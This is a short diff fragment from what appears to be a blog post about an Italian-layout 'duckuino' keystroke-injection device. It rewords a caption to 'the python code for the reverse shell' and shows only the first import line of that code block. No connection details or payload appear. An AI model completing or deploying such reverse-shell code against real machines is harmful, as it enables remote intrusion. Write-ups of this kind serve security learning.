usg-ishimura/usg-ishimura.github.io/_posts/2024-02-13-italian-duckuino.md

 }
 ```

-And the code for the reverse shell:
+And the python code for the reverse shell:

 ```python
 import os,socket,subprocess,threading;